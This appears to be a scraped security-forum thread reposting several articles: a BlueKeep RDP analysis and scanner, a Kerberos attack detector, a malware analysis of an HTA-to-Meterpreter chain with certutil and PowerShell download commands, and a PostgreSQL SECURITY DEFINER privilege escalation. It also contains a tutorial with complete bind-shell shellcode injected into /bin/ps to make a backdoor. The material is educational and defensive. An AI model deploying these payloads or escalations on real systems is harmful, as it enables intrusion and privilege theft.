    However, during GCC Conference Initialization, the Client supplies the channel name which is not whitelisted by the server, meaning an attacker can setup another SVC named “MS_T120” on a channel other than 31. It’s the use of MS_T120 in a channel other than 31 that leads to heap memory corruption and remote code execution (RCE).

    Figure 3 shows an abnormal channel request during the GCC Conference Initialization sequence with “MS_T120” channel on channel number 4.

     

    Screen-Shot-2019-05-21-at-5.22.08-PM.png

    Figure 3: Abnormal/Suspicious GCC Conference Initialization Sequence – MS_T120 on nonstandard channel

     

    The components involved in the MS_T120 channel management are highlighted in figure 4. The MS_T120 reference channel is created in the rdpwsx.dll and the heap pool allocated in rdpwp.sys. The heap corruption happens in termdd.sys when the MS_T120 reference channel is processed within the context of a channel index other than 31.

     

    Picture4.png

    Figure 4: Windows Kernel and User Components

     

    The Microsoft patch as shown in figure 5 now adds a check for a client connection request using channel name “MS_T120” and ensures it binds to channel 31 only(1Fh) in the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions within termdd.sys.

     

    Screen-Shot-2019-05-21-at-5.22.19-PM.png

    Figure 5: Microsoft Patch Adding Channel Binding Check

     

    After we investigated the patch being applied for both Windows 2003 and XP and understood how the RDP protocol was parsed before and after patch, we decided to test and create a Proof-of-Concept (PoC) that would use the vulnerability and remotely execute code on a victim’s machine to launch the calculator application, a well-known litmus test for remote code execution.

     

    Picture6.png

    Figure 6: Screenshot of our PoC executing

     

    For our setup, RDP was running on the machine and we confirmed we had the unpatched versions running on the test setup. The result of our exploit can be viewed in the following video:

     

     

    There is a gray area to responsible disclosure. With our investigation we can confirm that the exploit is working and that it is possible to remotely execute code on a vulnerable system without authentication. Network Level Authentication should be effective to stop this exploit if enabled; however, if an attacker has credentials, they will bypass this step.

    As a patch is available, we decided not to provide earlier in-depth detail about the exploit or publicly release a proof of concept. That would, in our opinion, not be responsible and may further the interests of malicious adversaries.

     

    Recommendations:

    • We can confirm that a patched system will stop the exploit and highly recommend patching as soon as possible.
    • Disable RDP from outside of your network and limit it internally; disable entirely if not needed. The exploit is not successful when RDP is disabled.
    • Client requests with “MS_T120” on any channel other than 31 during GCC Conference Initialization sequence of the RDP protocol should be blocked unless there is evidence for legitimate use case.

     

    It is important to note as well that the RDP default port can be changed in a registry field, and after a reboot will be tied the newly specified port. From a detection standpoint this is highly relevant.

     

    Picture7.png

    Figure 7: RDP default port can be modified in the registry

     

    Malware or administrators inside of a corporation can change this with admin rights (or with a program that bypasses UAC) and write this new port in the registry; if the system is not patched the vulnerability will still be exploitable over the unique port.

     

    McAfee Customers:

    McAfee NSP customers are protected via the following signature released on 5/21/2019:

    0x47900c00 “RDP: Microsoft Remote Desktop MS_T120 Channel Bind Attempt”

    If you have any questions, please contact McAfee Technical Support.

     

    Sursa: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/

  12. CVE-2019-0708

    CVE-2019-0708 "BlueKeep" Scanner PoC by @JaGoTu and @zerosum0x0.

    CVE-2019-0708 Scanner

    In this repo

    A scanner fork of rdesktop that can detect if a host is vulnerable to CVE-2019-0708 Microsoft Windows Remote Desktop Services Remote Code Execution vulnerability. It shouldn't cause denial-of-service, but there is never a 100% guarantee across all vulnerable versions of the RDP stack over the years. The code has only been tested on Linux and may not work in other environments (BSD/OS X), and requires the standard X11 GUI to be running (though the RDP window is hidden for convenience).

    There is also a Metasploit module, which is a current work in progress (MSF does not have an RDP library).

    Building

    There is a pre-made rdesktop binary in the repo, but the steps to building from source are as follows:

    git clone https://github.com/zerosum0x0/CVE-2019-0708.git
    cd CVE-2019-0708/rdesktop-fork-bd6aa6acddf0ba640a49834807872f4cc0d0a773/
    ./bootstrap
    ./configure --disable-credssp --disable-smartcard
    make
    ./rdesktop 192.168.1.7:3389
    

    Please refer to the normal rdesktop compilation instructions.

    Is this dangerous?

    Small details of the vulnerability have already begun to reach mainstream. This tool does not grant attackers a free ride to a theoretical RCE.

    Modifying this PoC to trigger the denial-of-service does lower the bar of entry but will also require some amount of effort. We currently offer no explanation of how this scanner works other than to tell the user it seems to be accurate in testing and follows a logical path.

    System administrators need tools like this to discover vulnerable hosts. This tool is offered for legal purposes only and to forward the security community's understanding of this vulnerability. As it does exploit the vulnerability, do not use against targets without prior permission.

    License

    rdesktop fork is licensed as GPLv3.

    Metasploit module is licensed as Apache 2.0.

     

    Sursa: https://github.com/zerosum0x0/CVE-2019-0708

    • Upvote 1
  13. Why?

    I needed a simple and reliable way to delete Facebook posts. There are third-party apps that claim to do this, but they all require handing over your credentials, or are unreliable in other ways. Since this uses Selenium, it is more reliable, as it uses your real web browser, and it is less likely Facebook will block or throttle you.

    As for why you would want to do this in the first place. That is up to you. Personally I wanted a way to delete most of my content on Facebook without deleting my account.

    Will this really delete posts?

    I can make no guarantees that Facebook doesn't store the data somewhere forever in cold storage. However this tool is intended more as a way to clean up your online presence and not have to worry about what you wrote from years ago. Personally, I did this so I would feel less attached to my Facebook profile (and hence feel the need to use it less).

    How To Use

    • Make sure that you have Google Chrome installed and that it is up to date, as well as the chromedriver for Selenium. See here. On Arch Linux you can find this in the chromium package, but it will vary by OS.
    • pip3 install --user delete-facebook-posts
    • deletefb -E "youremail@example.org" -P "yourfacebookpassword" -U "https://www.facebook.com/your.profile.url"
    • The script will log into your Facebook account, go to your profile page, and start deleting posts. If it cannot delete something, then it will "hide" it from your timeline instead.
    • Be patient as it will take a very long time, but it will eventually clear everything. You may safely minimize the chrome window without breaking it.

    How To Install Python

    MacOS

    See this link for instructions on installing with Brew.

    Linux

    Use your native package manager

    Windows

    See this link, but I make no guarantees that Selenium will actually work as I have not tested it.

    Bugs

    If it stops working or otherwise crashes, delete the latest post manually and start it again after waiting a minute. I make no guarantees that it will work perfectly for every profile. Please file an issue if you run into any problems.

     

    Sursa: https://github.com/weskerfoot/DeleteFB

    • Thanks 2
    • Upvote 3
  14. Android✔@Android

    For Huawei users' questions regarding our steps to comply w/ the recent US government actions: We assure you while we are complying with all US gov't requirements, services like Google Play & security from Google Play Protect will keep functioning on your existing Huawei device.

     

    Via: https://www.gadget.ro/care-sunt-implicatiile-pentru-cei-ce-folosesc-un-smartphone-huawei/

  15. Do not run "public" RDP exploits, they are backdored.

     

    Edit: PoC-ul pe care il gasiti va executa asta la voi in calculator (Windows only):

     

    mshta vbscript:msgbox("you play basketball like caixukun!",64,"K8gege:")(window.close)

     

    • Upvote 1
  16. Real-time detection of high-risk attacks leveraging Kerberos and SMB

    This is a real-time detection tool for detecting attack against Active Directory. The tools is the improved version of the previous version. Our tool can useful for immediate incident response for targeted attacks.

    The tool detects the following attack activities using Event logs and Kerberos/SMB packets.

    • Attacks leveraging the vulnerabilities fixed in MS14-068 and MS17-010
    • Attacks using Golden Ticket
    • Attacks using Silver Ticket

    Overview of the tool

    The tool is tested in Windows 2008 R2, 2012 R2, 2016. Documentation of the tool is here

    Tool detail

    Function of the tool

    Our tool consists of the following components:

    • Detection Server: Detects attack activities leveraging Domain Administrator privileges using signature based detection and Machine Learning. Detection programs are implemented by Web API.
    • Log Server for Event Logs: Log Server is implemented using Elactic Stack. It collects the Domain Controller’s Event logs in real-time and provide log search and visualization.
    • Log Server for packets: Collect Kerberos packets using tshark. Cpllected packets are sent to Elastic search using Logsrash.

    Our method consists of the following functions.

    • Event Log analysis
    • Packet analysis
    • Identification of tactics in ATT&CK

    Event Log analysis

    1. If someone access to the Domain Controller including attacks, activities are recorded in the Event log.
    2. Each Event Log is sent to Logstash in real-time by Winlogbeat.
      Logstash extracts input data from the Event log, then call the detection API on Detection Server.
    3. Detection API is launched. Firstly, analyze the log with signature detection.
    4. Next analyze the log with machine learning.
    5. If attack is detected, judge the log is recorded by attack activities.
      Send alert E-mail to the security administrator, and add a flag indicates attack to the log .
    6. Transfer the log to Elasticsearch .

    Input of the tools: Event logs of the Domain Controller.

    • 4672: An account assigned with special privileges logged on.
    • 4674: An operation was attempted on a privileged object
    • 4688: A new process was created
    • 4768: A Kerberos authentication ticket (TGT) was requested
    • 4769: A Kerberos service ticket was requested
    • 5140: A network share object was accessed

    Packet analysis

    1. If someone access to the Domain Controller including attacks, Kerberos packets are sent to Domain Controller.
    2. Tshark collects Kerberos packets.
      Logstash extracts input data from the packets, then call the detection API on Detection Server.
    3. Detection API is launched. Analyze wheter Golden Tickets and Silver Tickets are used from packets.
    4. If attack is detected, judge the log is recorded by attack activities.
      Send alert E-mail to the security administrator, and add a flag indicates attack to the packet .
    5. Transfer the packet to Elasticsearch .

    Input of the tools: Kerberos packets

    The following is the Kerberos message type used for detection.

    • 11: KRB_AS_REP
    • 12: KRB_TGS_REQ
    • 13: KRB_TGS_REP
    • 14: KRB_AP_REQ
    • 32: KRB_AP_ERR_TKT_EXPIRED

    Output (result) of the tool

    • Distinguish logs recorded by attack activities from logs recorded by normal operations, and identity infected computers and accounts.
      The detection result can be checked using Kibana.
    • If attacks are detected, send email alerts to the specific E-mail address.

    System Requirements

    We tested our tool in the following environment.

    • Domain Controller (Windows 2008R2/ 2012 R2/ 2016)
      • Winlogbeat(5.4.2): Open-source log analysis platform
    • Log Server for Event Logs: Open-source tools + Logstash pipeline
      • OS: CentOS 7
      • Logstash(6.5.0): Parse logs, launch the detection program, transfer logs to Elastic Search
      • Elastic Search(6.5.0): Collects logs and provides API interface for log detection
      • Kibana(6.5.0): Visualizes the detection results
    • Log Server for packet analysis: Open-source tools + Logstash pipeline
      • OS: CentOS 7
      • Logstash(6.5.0): Parse logs, launch the detection program, transfer logs to Elastic Search
      • tshark: Collect and save packets
    • Detection Server: Custom detection programs
      • OS: CentOS 7
      • Python: 3.6.0
      • Flask: 0.12
      • scikit-learn: 0.19.1

    How to implement

    See implementation method

     

    Sursa: https://github.com/sisoc-tokyo/Real-timeDetectionAD_ver2

    • Upvote 1
  17. Injecting shellcode into x64 ELF binaries

     
    by matteo_malvica May 18, 2019

    Index

    Intro

    Recently, I have decided to tackle another challenge from the Practical Binary Analysis book, which is the latest one from Chapter 7.

    It asks the reader to create a parasite binary from a legitimate one. I have picked ps, the process snapshot utility, where I have implanted a bind-shell as a child process.

    Inspecting the target

    Let’s start our ride by creating a copy of the original executable (can be anyone) into our working folder.

    $ cp /bin/ps ps_teo
    

    And take note of the original entry point.

    $ readelf -h ps_teo
    ELF Header:
    ...
      Entry point address:               0x402f10
    ...
    

    We will be replacing the original entry point with the address of our malicious section and restore normal execution after the shellcode has done its job. But, before jumping to that we should plan our shellcode.

    Shellcoding our way out

    We said we want a bind shell, right? Here a modified version of a standard x64 bindshell, where we make use of the fork systemcall to spawn a child process.

    BITS 64
    
    SECTION .text
    global main
    
    section .text
    
    main:
      push rax         ; save all clobbered registers
      push rcx               
      push rdx
      push rsi
      push rdi
      push r11
    
      ;fork
      xor rax,rax
      add rax,57
      syscall
      cmp eax, 0
      jz child
    
    parent:
      pop r11          ; restore all registers
      pop rdi
      pop rsi
      pop rdx
      pop rcx
      pop rax
    
      push 0x402f10    ; jump to original entry point
      ret
    
    child:  
      ; socket
      xor eax,eax
      xor ebx,ebx
      xor edx,edx
      ;socket
      mov al,0x1
      mov esi,eax
      inc al
      mov edi,eax
      mov dl,0x6
      mov al,0x29      ; sys_socket (syscall 41)
      syscall
    
      xchg ebx,eax
    
      ; bind
      xor  rax,rax
      push   rax
      push 0x39300102. ; port 12345
      mov  [rsp+1],al
      mov  rsi,rsp
      mov  dl,16
      mov  edi,ebx
      mov  al,0x31     ; sys_bind (syscall 49)
      syscall
    
      ;listen
      mov  al,0x5
      mov esi,eax
      mov  edi,ebx
      mov  al,0x32     ; sys_listen (syscall 50)
      syscall
    
      ;accept
      xor edx,edx
      xor esi,esi
      mov edi,ebx
      mov al,0x2b      ; sys_accept (43)
      syscall
      mov edi,eax      ; store socket
    
      ;dup2
      xor rax,rax
      mov esi,eax
      mov al,0x21      ; sys_dup2 (syscall 33)
      syscall
      inc al
      mov esi,eax
      mov al,0x21
      syscall
      inc al
      mov esi,eax
      mov al,0x21
      syscall
    
      ;exec
      xor rdx,rdx
      mov rbx,0x68732f6e69622fff
      shr rbx,0x8
      push rbx
      mov rdi,rsp
      xor rax,rax
      push rax
      push rdi
      mov  rsi,rsp
      mov al,0x3b      ; sys_execve (59)
      syscall
      call exit
    
    exit:
      mov     ebx,0    ; Exit code
      mov     eax,60   ; SYS_EXIT
      int     0x80
    
    

    We start by saving all registers, then we call the child routine and we finish by restoring execution to the original entry point. Let’s now create a raw binary from this NASM file, which can be used by our injection process later on.

    nasm -f bin -o bind_shell.bin bind_shell.s
    

    ELF-Inject

    Our very next step is to inject a bind-shell into the ps ELF via a tool named aptly ELF Inject, which is available from the book source code.

    ./elfinject ps_teo bind_shell.bin ".injected" 0x800000 -1
    

    If we inspect the binary once more, we can notice the new .injected section around location 0x800000

    $ readelf --wide --headers ps_teo  | grep injected
      [27] .injected         PROGBITS        0000000000800c80 017c80 0000b0 00  AX  0   0 16
    

    Guess what? The value 800c80 is going to be our new entry point.
    I wrote a quick and dirt script that patch the entry-point on the fly.

    import sys
    import binascii
    
    # usage: ep_patcher.py -filename -new_entrypoint
    patch_file_input = sys.argv[1]
    new_ep = sys.argv[2]
    new_ep = binascii.unhexlify(new_ep)
    
    with open(patch_file_input, 'rb+') as f:
        f.seek(24)
        f.write(new_ep)
    

    We can test it and. . .

    python patcher.py ps_teo 800c80
    

    . . .we can verify that the new entry point has been modified correctly:

    $ readelf  -h ps_teo
    ELF Header:
    ...
      Entry point address:               0x800c80
    ...
    

    After we ran the injected version of ps, we can notice a new listening socket on port 12345:

    $ netstat -antulp | grep 12345
    tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN      6898/ps_teo
    

    Which leads to the expected backdoor:

    $ nc localhost 12345
    id
    uid=1000(binary) gid=1000(binary) groups=1000(binary),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
    
    whoami
    binary
    

    Extra stealthiness

    If we would like to hide from ps or top we could go even further and revise the whole shellcode to force it alter the /proc/ folder like this or that one.

     

    Sursa: https://www.matteomalvica.com/blog/2019/05/18/elf-injection/

    • Upvote 1
  18. Congratulations, You’ve Won a Meterpreter Shell

    Posted by Josh Stroschein, Ratnesh Pandey and Alex Holland.

    For an attack to succeed undetected, attackers need to limit the creation of file and network artifacts by their malware. In this post, we analyse an attack that illustrates two popular tactics to evade detection:

    1. Avoiding saving file artifacts to disk by running malicious code directly in memory. These have been described as “fileless” attacks.[1]
    2. Using legitimate programs built into an operating system to perform or facilitate malicious functionality, such as code execution, persistence, lateral movement and command and control (C2). The abuse of these programs is known as “living-off-the-land”.[2]

    Our attack began with a user clicking on a hyperlink that took them to a website hosting a malicious HTA (HTML Application) file. The HTA file led to the execution of two stages of shellcode that ultimately resulted in a Meterpreter reverse HTTP shell session being established with a C2 server. The attack was successfully contained, however, because Bromium Secure Platform (BSP) isolates risky activities such as opening a web page within a micro-virtual machine. Consequently, the attacker was unable to gain a foothold in the network.

    Although the use of HTA files is a well-understood technique to execute malicious code,[3] we thought this attack was worth exploring because of the steps the attacker took to reduce the footprint of the attack. These included executing multiple stages of shellcode directly in memory, applying information gained from reconnaissance of the target to disguise the attacker’s network traffic, and the use of living-off-the-land binaries.

    It begins with an HTA file

    After clicking the hyperlink, the target is prompted to save a file named sweepstakeApp.hta to disk. If the site is visited using Internet Explorer the target is prompted to run or save the file from their web browser (figure 1). This is significant because HTA files can only be opened directly from Internet Explorer or from Windows Explorer using Microsoft HTML Application Host (mshta.exe), but not from other web browsers. The decision to use an HTA file as the vector to execute the attacker’s code suggests a level of knowledge about how the targeted host was configured, such as the default web browser in use. HTA files allow developers to use the functionality of Internet Explorer’s engine, including its support for scripting languages such as VBScript and JavaScript, without its user interface and security features.[4]

    internet_explorer_hta_prompt.pngFigure 1 – Prompt to open or save malicious HTA file in Internet Explorer.

    The downloaded HTA file contains obfuscated VBScript code, as shown in figure 2. On execution, it launches two commands using powershell.exe and cmd.exe by instantiating a WScript.Shell object that enables scripts to interact with parts of the Windows shell. Meanwhile the user is shown a pop-up window with the supposed results of a gift card sweepstake (figure 3).

    hta_obfuscated_vbscript.pngFigure 2 – Obfuscated VBScript code in the HTA file.

    decoy_hta_pop_up.pngFigure 3 – Pop-up presenting the decoy application to the user.

    The first command downloads an obfuscated PowerShell command from a URL using PowerShell’s WebClient.DownloadString method and then executes it in memory using the alias of the Invoke-Expression cmdlet, IEX.

    powershell_001.pngFigure 4 – PowerShell command that downloads and runs an obfuscated script in memory.

    powershell_002.pngFigure 5 – Obfuscated command downloaded using PowerShell.

    Verifying the first stage of the infection

    The second command launches a cmd.exe process which then runs certutil.exe, another program built into Windows which is used for managing digital certificates. The utility can also be used to download a file from a remote server. For example, by using the following command an attacker can download a file and save it locally:

    certutil.exe -urlcache -split -f [URL] DestinationFile

    In this case, however, the provided URL parameter was generated using %USERDOMAIN% and %USERNAME% environment variables on the target system and the destination file is called “null”.

    powershell_003.pngFigure 6 – Certutil command to inform adversary of successful running of HTA file.

    Navigating to the URL returns an HTTP 404 status code. Therefore, instead of downloading a file, this command is used to notify the attacker that the HTA file has successfully executed by sending a GET request to a web server controlled by the attacker containing the username and domain of the target host. The attacker can simply monitor their web server logs to determine which users successfully ran the HTA file.

    Analysis of the obfuscated PowerShell command

    The command downloaded by the PowerShell contains a compressed Base64 encoded string. After decoding and decompressing the string, it reveals another PowerShell command shown in figure 7.

    powershell_004.pngFigure 7 – Deobfuscated PowerShell command.

    The command in figure 7 contains an obfuscated string. First, the string is decoded from Base64. The result is then converted into a byte array and stored in a variable called $var_code. Finally, the script enters a For loop that iterates through the byte array and performs a bitwise XOR operation on each byte with a hard-coded value of 35 (base 10).

    xor.pngFigure 8 – For loop performing bitwise XOR operations on the byte array in $var_code.

    Following deobfuscation, the output in figure 9 is produced. You can spot several recognisable strings including a web browser user agent, IP address and URL.

    stage_one_shellcode.pngFigure 9 – First stage shellcode.

    This is the first stage of shellcode, which PowerShell executes in memory using the delegate function VirtualAlloc. The function call allocates memory with a flAllocationType of 3000 (MEM_RESERVED and MEM_COMMIT) and memory protection permissions of PAGE_EXECUTE_READWRITE.

    First stage shellcode analysis

    Emulating the first stage of shellcode in scdbg reveals its functionality (figure 10). A call to LoadLibraryA is used to load the WinINet module into the process space of the calling process, in this case powershell.exe. WinINet is a standard Windows API that is used by software to communicate with resources on the Internet over HTTP and FTP protocols.

    Next a call to InternetOpenA is made to initialise a network connection. This is followed by a call to InternetConnectA, which opens a HTTPS session to a remote server over TCP port 443. Afterwards, a HttpOpenRequestA is called to create a HTTP request to retrieve an object from the server (/pwn32.gif?pwnd=true). Since the lpszVerb parameter is null, the request will use the GET method. Several options are then configured using InternetSetOptionA. Finally, the request is sent in the call to HttpSendRequestA. We can see that a custom user agent string was defined, along with a cookie value:

    Cookie: Session 
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

    The user agent string corresponds to Internet Explorer 11 on Windows 10. Significantly, the user agent string matches the version of Internet Explorer used on the targeted host, which is another indicator of the attacker’s knowledge of the targeted network. By mimicking the user agent string, the network traffic generated by the malware is more likely to blend in with the target organisation’s legitimate traffic.

    scdbg_shellcode.pngFigure 10 – First stage shellcode emulated in scdbg.

    Decompiling the shellcode confirms the findings of scdbg. The shellcode begins with typical position independent code (PIC) behaviour by calling function sub_88, whose first instruction is to load the top of the stack into the EBP register. This allows for the code to figure out a base address because the CALL instruction places the address of the next instruction onto the stack (figure 11).

    shellcode_analysis_1.pngFigure 11 – Call to sub_88.

    shellcode_analysis_2.pngFigure 12 – Popping the value at the top of the stack to EBP.

    The malware author used stack strings to generate strings on the stack, although they appear to be used sparingly in the shellcode. This is an easy way of creating and using strings in shellcode, while also making the functionality of the shellcode harder to discover using standard string-finding utilities. Figure 12 shows the use of a stack string, which is used as an argument to a Windows API function call.

    Resolving functions is also an important first step for shellcode. Since shellcode doesn’t go through the process of loading as a normal executable, it must resolve function addresses independently. This is often accomplished by using undocumented structures within a process and manually walking the export table of already loaded libraries. In addition, many shellcode authors will avoid using strings to find the functions they need. Instead, they’ll use pre-computed hash values. Their code will then compute the hash value of the library they need functions from and compare the hashes. This is not only a computationally inexpensive way of finding functions, but also complicates analysis as the analyst must correlate the hashes to the functions they represent. Figure 12 demonstrates the use of this technique, in that a seemingly random 4-byte value is pushed onto the stack before the call to EBP. EBP will contain the address of the function responsible for finding the desired function pointers and eventually executing those functions.

    shellcode_analysis_3.pngFigure 13 – Stack strings.

    The call to EBP is the address after the original call instruction. This code begins by obtaining a pointer to the process environment block, or PEB, structure via FS:30h. This structure allows the code to obtain a doubly linked list of all libraries loaded in the process space. Walking this structure allows the code to find the base address of any library, then walk the export table to find function pointers. Therefore, this function is responsible for using the pre-computed hash to find all the functions called throughout the code and will be used repeatedly throughout.

    If unfamiliar with how shellcode uses the PEB structure and parses the portable executable (PE) file format to find function pointers, it’s worth spending some time analysing this function. However, there is no need to get lost in this function for the purposes of this analysis. Instead, evidence of a non-standard function return can help determine when the function is done and allow an analyst to focus on tracing through the shellcode effectively. In this shellcode there is a non-standard return at the end – which is a JMP EAX (figure 14).

    shellcode_analysis_4.pngFigure 14 – Non-standard return.

    At this point, the code is going to JMP into whatever function was resolved. You can use this function to help identify the functions called throughout the code.

    windbg.pngFigure 15 – Function to resolve API names.

    Further functions are called through the calls to EBP, with the appropriate arguments being placed on the stack before the call. This shellcode carries out the task of creating an HTTP reverse shell. To do that, it will use many core HTTP functions found within the WinINet library. This is in fact shellcode for the first stage of a Meterpreter reverse HTTP shell payload.[5] The default behavior of a Metasploit reverse shell comes in two stages. The first, analysed above, functions as a downloader which grabs the second stage, which is the Meterpreter payload.

    Functions used in this shellcode:

    • LoadLibrary(WinINet)
    • InternetOpenA
    • InternetConnectA
    • HttpOpenRequestA
    • InternetSetOptionA
    • HttpSendRequestA
    • GetDesktopWindow
    • InternetErrorDlg
    • VirtualAllocStub
    • InternetReadFile

    process_interaction_graph.pngFigure 16 – Process interaction graph as viewed in Bromium Controller.

    high_severity_events.pngFigure 17 – High severity events generated during the life cycle of this threat.

    Mitigation

    Endpoints that are running Bromium are protected from this threat because every user task, such as running an HTA file, is run in its own isolated micro-virtual machine or μVM. When the user closes a μVM, the virtual machine is destroyed along with the malware. The trace of threat data from the attack is recorded and presented in the Bromium Controller, enabling security teams to quickly gain detailed insights into the threats facing their organisations.

    References

    [1] https://zeltser.com/fileless-attacks/
    [2] https://lolbas-project.github.io/
    [3] https://attack.mitre.org/techniques/T1170/
    [4] https://docs.microsoft.com/en-us/previous-versions//ms536471(v=vs.85)
    [5] https://github.com/rapid7/metasploit-framework/wiki/Meterpreter

     

    The post Congratulations, You’ve Won a Meterpreter Shell appeared first on Bromium.

     

    Sursa: https://securityboulevard.com/2019/05/congratulations-youve-won-a-meterpreter-shell/

    • Thanks 1
  19. Abusing SECURITY DEFINER functions

    Blog » Abusing SECURITY DEFINER functions

    Posted on 17. May 2019 by Laurenz Albe
    security problems © xkcd.com under the Creative Commons License 2.5

     

    Functions defined as SECURITY DEFINER are a powerful, but dangerous tool in PostgreSQL.

    The documentation warns of the dangers:

    Because a SECURITY DEFINER function is executed with the privileges of the user that owns it, care is needed to ensure that the function cannot be misused. For security, search_path should be set to exclude any schemas writable by untrusted users. This prevents malicious users from creating objects (e.g., tables, functions, and operators) that mask objects intended to be used by the function.

    This article describes such an attack, in the hope to alert people that this is no idle warning.

    What is SECURITY DEFINER good for?

    By default, PostgreSQL functions are defined as SECURITY INVOKER. That means that they are executed with the User ID and security context of the user that calls them. SQL statements executed by such a function run with the same permissions as if the user had executed them directly.

    A SECURITY DEFINER function will run with the User ID and security context of the function owner.

    This can be used to allow a low privileged user to execute an operation that requires high privileges in a controlled fashion: you define a SECURITY DEFINER function owned by a privileged user that executes the operation. The function restricts the operation in the desired way.

    For example, you can allow a user to use COPY TO, but only to a certain directory. The function has to be owned by a superuser (or, from v11 on, by a user with the pg_write_server_files role).

    What is the danger?

    Of course such functions have to be written very carefully to avoid software errors that could be abused.

    But even if the code is well-written, there is a danger: unqualified access to database objects from the function (that is, accessing objects without explicitly specifying the schema) can affect other objects than the author of the function intended. This is because the configuration parameter search_path can be modified in a database session. This parameter governs which schemas are searched to locate the database object.

    The documentation has an example where search_path is used to have a password checking function inadvertedly check a temporary table for passwords.

    You may think you can avoid the danger by using the schema name in each table access, but that is not good enough.

    A harmless (?) SECURITY DEFINER function

    Consider this seemingly harmless example of a SECURITY DEFINER function, that does not control search_path properly:

    CREATE FUNCTION public.harmless(integer) RETURNS integer
       LANGUAGE sql SECURITY DEFINER AS
    'SELECT $1 + 1';

    Let’s assume that this function is owned by a superuser.

    Now this looks pretty safe at first glance: no table or view is used, so nothing can happen, right? Wrong!

    How the “harmless” function can be abused

    The attack depends on two things:

    • There is a schema (public) where the attacker can create objects.
    • PostgreSQL is very extensible, so you can not only create new tables and functions, but also new types and operators (among other things).

    The malicious database user “meany” can simply run the following code:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    /*
     * SQL functions can run several statements, the result of the
     * last one is the function result.
     * The "OPERATOR" syntax is necessary to schema-qualify an operator
     * (you can't just write "$1 pg_catalog.+ $2").
     */
     
    CREATE FUNCTION public.sum(integer, integer) RETURNS integer
       LANGUAGE sql AS
    'ALTER ROLE meany SUPERUSER; SELECT $1 OPERATOR(pg_catalog.+) $2';
     
    CREATE OPERATOR public.+ (
       FUNCTION = public.sum,
       LEFTARG = integer,
       RIGHTARG = integer
    );
     
    /*
     * By default, "pg_catalog" is added to "search_path" in front of
     * the schemas that are specified.
     * We have to put it somewhere else explicitly to change that.
     */
     
    SET search_path = public,pg_catalog;
     
    SELECT public.harmless(41);
     
     harmless
    ----------
           42
    (1 row)
     
    \du meany
     
               List of roles
     Role name | Attributes | Member of
    -----------+------------+-----------
     meany     | Superuser  | {}

    What happened?

    The function executed with superuser permissions. search_path was set to find the (unqualified!) “+” operator in schema public rather than in pg_catalog. So the user-defined function public.sum was executed with superuser privileges and turned the attacker into a superuser.

    If the attacker had called the function public.sum himself (or issued the ALTER ROLE statement), it would have caused a “permission denied” error. But since the SELECT statement inside the function ran with superuser permissions, so did the operator function.

    How can you protect yourself?

    In theory you can schema-qualify everything, including operators, inside the function body, but the risk that you forget a harmless “+” or “=” is just too big. Besides, that would make your code hard to read, which is not good for software quality.

    Therefore, you should take the following measures:

    • As recommended by the documentation, always set search_path on a SECURITY DEFINER function. Apart from the schemas that you need in the function, put pg_temp on the list as the last element.
    • Don’t have any schemas in the database where untrusted users have the CREATE privilege. In particular, remove the default public CREATE privilege from the public schema.
    • Revoke the public EXECUTE privilege on all SECURITY DEFINER functions and grant it only to those users that need it.

    In SQL:

    1
    2
    3
    4
    5
    6
    ALTER FUNCTION harmless(integer)
       SET search_path = pg_catalog,pg_temp;
     
    REVOKE CREATE ON SCHEMA public FROM PUBLIC;
     
    REVOKE EXECUTE ON FUNCTION harmless(integer) FROM PUBLIC;
    Laurenz Albe

    Laurenz Albe is a senior consultant and support engineer at Cybertec. He has been working with and contributing to PostgreSQL for 13 years.

     

    Sursa: https://www.cybertec-postgresql.com/en/abusing-security-definer-functions/

    • Upvote 1
  20. Understanding Windows OS Architecture – Theory

    windbg4.png

    Hi Everyone,

    In this blog, we will try to understand Windows OS architecture.To perform debugging operations, you must understand the binaries/executables/processes. To understand binaries/executables/processes, you must understand OS architecture.

    Unlike *nix, Windows OS is very complex piece of software. This is by the fact that Microsoft developed various, different components (such as COM+, OLE, PowerShell etc.) communicating with each other via WinAPIs and similar stuff. Considering this, covering each and everything in one single blog post is not a good idea.

    To keep this blogpost concise, we will understand basic component (such as Process, thread etc.). Then we will see the big picture. Other Microsoft technologies (such as .NET, Azure etc.) won’t be covered in this blogpost. As name suggests, this blog will be all theory. It may become boring, but please, bear with me!!!

    Now to explain all these things in details, I’ll be using multiple resources. I’ll put all those in reference section in the end.

    As scope is clear, we are ready to dive into Windows OS architecture.

    Building blocks of Windows OS:

    • Process: Process represents running instance of executable. Process manages/owns couple of things listed below.
      • Executable binary: It contains initial code and data to execute code within process.
      • Private virtual address space: Used as allocating memory for code within process on requirement basis.
      • Primary token: This object stores multiple details regarding default security context of process and used as reference by threads within process.
      • Private handle table: Table used for managing executive objects such as events, semaphores and files.
      • Thread(s) for process execution

    Processes are identified by unique process id. This ID remains constant till respective kernel process object exists. Now its important to note that every running instance of same binary will get separate process and process id.

    All above can be summed up in next diagram.

    01-Process-Structure.jpg Windows Process Structure
    • Virtual Memory: OS provides separate virtual, private, linear address space to every process. This space is used by processes to allocate memory to executables, threads, DLLs etc. Size of this address space depends upon how many bits process supports i.e. 32 or 64bit. 2(Bit) can provide supported total available VAS.

    For 32bit processes on 32bit Windows, it is 4GB (2GB system processes + 2 GB user processes). This distribution can vary up to 1GB System process + 3GB for user process, if process is marked with LARGEADDRESSAWARE linker flag in header while compiling program in Visual Studio. For 32bit processes on 64bit Windows, limit goes up to 4GB user process, if process is marked with LARGEADDRESSAWARE linker flag in header while compiling program in Visual Studio. For 64bit processes, on Windows 10 64bit (our target system), it is 128TB system process + 128TB user process.

    02-Address-Space-Layouts-for-x86-Windows 32 bit process on 32 bit Windows OS
    03-Address-Space-Layouts-for-x64-Windows 64 bit process on 64 bit Windows OS

    Now the reason to call memory scheme Virtual because the virtual address is not directly related physical address (i.e. actual address location in RAM and/or Storage). Virtual to physical mapping is done by memory manager. We will explore this in much detail in next blogpost.

